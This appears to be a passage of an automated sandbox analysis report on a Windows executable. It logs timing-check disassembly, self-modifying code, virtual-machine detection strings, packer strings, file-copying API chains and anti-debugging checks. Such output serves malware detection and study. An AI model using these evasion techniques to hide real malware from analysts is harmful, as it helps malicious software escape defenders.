                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D90FEB second address: D90FF1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D90FF1 second address: D90FF7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D90FF7 second address: D90FFB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D95F12 second address: D95F2B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F0C44EBA8EFh 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D9E153 second address: D9E165 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 jo 00007F0C44DA4003h 0x0000000d pushad 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D9C3C8 second address: D9C3CC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D9C826 second address: D9C82F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 pushad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D9C992 second address: D9C998 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D9C998 second address: D9C99C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D9CC82 second address: D9CC8E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 jbe 00007F0C44EBA8E6h 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D9CFAF second address: D9CFB5 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D9D127 second address: D9D13D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0C44EBA8F2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D9D13D second address: D9D147 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jl 00007F0C44DA3FE6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D9D147 second address: D9D14B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D9DFC4 second address: D9DFDC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jmp 00007F0C44DA3FF3h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D9BE16 second address: D9BE1A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D9BE1A second address: D9BE3B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jng 00007F0C44DA3FFBh 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D9BE3B second address: D9BE55 instructions: 0x00000000 rdtsc 0x00000002 js 00007F0C44EBA8ECh 0x00000008 je 00007F0C44EBA8E6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 ja 00007F0C44EBA8E8h 0x00000018 pushad 0x00000019 popad 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE0EB4 second address: CE0EC2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edi 0x00000006 ja 00007F0C44DA3FE6h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA5491 second address: DA5495 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA5495 second address: DA54A5 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F0C44DA3FE6h 0x00000008 jns 00007F0C44DA3FE6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA54A5 second address: DA54BE instructions: 0x00000000 rdtsc 0x00000002 jne 00007F0C44EBA8EEh 0x00000008 pushad 0x00000009 jp 00007F0C44EBA8E6h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA54BE second address: DA54C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DB1B2F second address: DB1B3D instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jnl 00007F0C44EBA8E6h 0x00000009 pop ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DB9C7D second address: DB9C81 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DBEFA3 second address: DBEFB9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push esi 0x00000006 pushad 0x00000007 popad 0x00000008 jmp 00007F0C44EBA8EDh 0x0000000d pop esi 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DC3889 second address: DC388D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DC388D second address: DC38A4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0C44EBA8F3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DC38A4 second address: DC38D7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0C44DA3FF0h 0x00000007 push eax 0x00000008 push edx 0x00000009 jng 00007F0C44DA3FE6h 0x0000000f jmp 00007F0C44DA3FF9h 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DC3743 second address: DC374D instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DC374D second address: DC3751 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DC3751 second address: DC376A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 ja 00007F0C44EBA8E6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c popad 0x0000000d push ecx 0x0000000e pushad 0x0000000f jnl 00007F0C44EBA8E6h 0x00000015 pushad 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DC7D09 second address: DC7D0F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DC7D0F second address: DC7D14 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DC7D14 second address: DC7D3C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0C44DA3FF8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jng 00007F0C44DA3FEAh 0x00000011 push ecx 0x00000012 pop ecx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DCEED2 second address: DCEF12 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0C44EBA8F2h 0x00000009 jmp 00007F0C44EBA8EDh 0x0000000e popad 0x0000000f jg 00007F0C44EBA8F9h 0x00000015 jmp 00007F0C44EBA8F3h 0x0000001a pushad 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DCEF12 second address: DCEF18 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DCF09C second address: DCF0A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DCF390 second address: DCF396 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DCF4D5 second address: DCF4F5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0C44EBA8F2h 0x00000007 jbe 00007F0C44EBA8E6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DCF4F5 second address: DCF4FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DCF63E second address: DCF644 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DCF644 second address: DCF64A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DCF64A second address: DCF64E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DD010D second address: DD0115 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DD4851 second address: DD4870 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0C44EBA8EBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push ecx 0x0000000c pushad 0x0000000d popad 0x0000000e jmp 00007F0C44EBA8EAh 0x00000013 pop ecx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DD49CC second address: DD49D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DD49D2 second address: DD49E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b jno 00007F0C44EBA8E6h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DD49E3 second address: DD49E7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DD49E7 second address: DD49FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnc 00007F0C44EBA8EEh 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DD6FD2 second address: DD7023 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0C44DA3FECh 0x00000007 push edi 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jnp 00007F0C44DA3FFEh 0x00000011 jg 00007F0C44DA3FFDh 0x00000017 push eax 0x00000018 push edx 0x00000019 push ecx 0x0000001a pop ecx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DF3ACA second address: DF3AE2 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F0C44EBA8E8h 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c jns 00007F0C44EBA8E6h 0x00000012 jbe 00007F0C44EBA8E6h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DF3AE2 second address: DF3AF3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0C44DA3FEDh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DF3AF3 second address: DF3B00 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DF54FC second address: DF550A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F0C44DA3FEEh 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DF550A second address: DF5511 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DF5511 second address: DF5517 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DF533A second address: DF5384 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0C44EBA8F6h 0x00000009 jmp 00007F0C44EBA8F7h 0x0000000e jmp 00007F0C44EBA8F3h 0x00000013 popad 0x00000014 push edi 0x00000015 push edi 0x00000016 pop edi 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E0800B second address: E08011 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E08011 second address: E08027 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jbe 00007F0C44EBA8E8h 0x0000000c jo 00007F0C44EBA8ECh 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E08027 second address: E08035 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 jl 00007F0C44DA3FE6h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E0785F second address: E07865 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E07865 second address: E0786C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E079DC second address: E079F8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0C44EBA8F8h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E079F8 second address: E07A06 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 jnc 00007F0C44DA3FE6h 0x0000000d pop ecx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E07B34 second address: E07B3A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E0A9F1 second address: E0AA0E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0C44DA3FF9h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E0AB9D second address: E0ABA3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E0AC21 second address: E0AC62 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop edi 0x00000006 nop 0x00000007 mov edx, 060826D8h 0x0000000c push 00000004h 0x0000000e push 00000000h 0x00000010 push eax 0x00000011 call 00007F0C44DA3FE8h 0x00000016 pop eax 0x00000017 mov dword ptr [esp+04h], eax 0x0000001b add dword ptr [esp+04h], 00000018h 0x00000023 inc eax 0x00000024 push eax 0x00000025 ret 0x00000026 pop eax 0x00000027 ret 0x00000028 push 63D3F7AFh 0x0000002d push eax 0x0000002e push edx 0x0000002f jmp 00007F0C44DA3FECh 0x00000034 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E0AE58 second address: E0AE5C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E0AE5C second address: E0AE60 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E0AE60 second address: E0AE66 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C8037F second address: 4C803DA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F0C44DA3FF1h 0x00000009 add al, FFFFFFF6h 0x0000000c jmp 00007F0C44DA3FF1h 0x00000011 popfd 0x00000012 movzx esi, bx 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 xchg eax, ebp 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c pushfd 0x0000001d jmp 00007F0C44DA3FF4h 0x00000022 and al, 00000048h 0x00000025 jmp 00007F0C44DA3FEBh 0x0000002a popfd 0x0000002b mov ch, BAh 0x0000002d popad 0x0000002e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C803DA second address: 4C80446 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 call 00007F0C44EBA8EEh 0x0000000a pop eax 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov ebp, esp 0x00000010 jmp 00007F0C44EBA8F1h 0x00000015 pop ebp 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 jmp 00007F0C44EBA8F3h 0x0000001e pushfd 0x0000001f jmp 00007F0C44EBA8F8h 0x00000024 sub ax, 5A68h 0x00000029 jmp 00007F0C44EBA8EBh 0x0000002e popfd 0x0000002f popad 0x00000030 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C8049C second address: 4C804F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 call 00007F0C44DA3FF1h 0x0000000a pushfd 0x0000000b jmp 00007F0C44DA3FF0h 0x00000010 xor ax, BCB8h 0x00000015 jmp 00007F0C44DA3FEBh 0x0000001a popfd 0x0000001b pop esi 0x0000001c popad 0x0000001d mov dword ptr [esp], ebp 0x00000020 pushad 0x00000021 mov eax, edx 0x00000023 popad 0x00000024 mov ebp, esp 0x00000026 push eax 0x00000027 push edx 0x00000028 pushad 0x00000029 movsx edx, ax 0x0000002c call 00007F0C44DA3FF0h 0x00000031 pop eax 0x00000032 popad 0x00000033 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D2A5B7 second address: D2A5BD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D2A5BD second address: D2A5C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: B719EF instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: B71933 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: D24B09 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: DAA822 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Users\user\Desktop\file.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\Desktop\file.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
Source: all processes Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_009238B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose, 0_2_009238B0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00924910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_00924910
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0091DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose, 0_2_0091DA80
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0091E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA, 0_2_0091E430
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0091ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose, 0_2_0091ED20
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00924570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen, 0_2_00924570
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0091F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_0091F6B0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00923EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose, 0_2_00923EA0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_009116D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_009116D0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0091DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_0091DE10
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0091BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose, 0_2_0091BE70
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00911160 GetSystemInfo,ExitProcess, 0_2_00911160
Source: file.exe, file.exe, 00000000.00000002.1786724469.0000000000CFB000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: file.exe, 00000000.00000002.1786322649.000000000069E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwareVMwarea5
Source: file.exe, 00000000.00000002.1786322649.0000000000712000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1786322649.00000000006E6000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: file.exe, 00000000.00000002.1786322649.000000000069E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwareVMware
Source: file.exe, 00000000.00000002.1786724469.0000000000CFB000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: C:\Users\user\Desktop\file.exe API call chain: ExitProcess graph end node graph_0-13579
Source: C:\Users\user\Desktop\file.exe API call chain: ExitProcess graph end node graph_0-13582
Source: C:\Users\user\Desktop\file.exe API call chain: ExitProcess graph end node graph_0-13600
Source: C:\Users\user\Desktop\file.exe API call chain: ExitProcess graph end node graph_0-13633
Source: C:\Users\user\Desktop\file.exe API call chain: ExitProcess graph end node graph_0-13593
Source: C:\Users\user\Desktop\file.exe System information queried: ModuleInformation
Source: C:\Users\user\Desktop\file.exe Process information queried: ProcessInformation

                Anti Debugging

Source: C:\Users\user\Desktop\file.exe Thread information set: HideFromDebugger
Source: C:\Users\user\Desktop\file.exe Open window title or class name: regmonclass
Source: C:\Users\user\Desktop\file.exe Open window title or class name: gbdyllo
Source: C:\Users\user\Desktop\file.exe Open window title or class name: process monitor - sysinternals: www.sysinternals.com
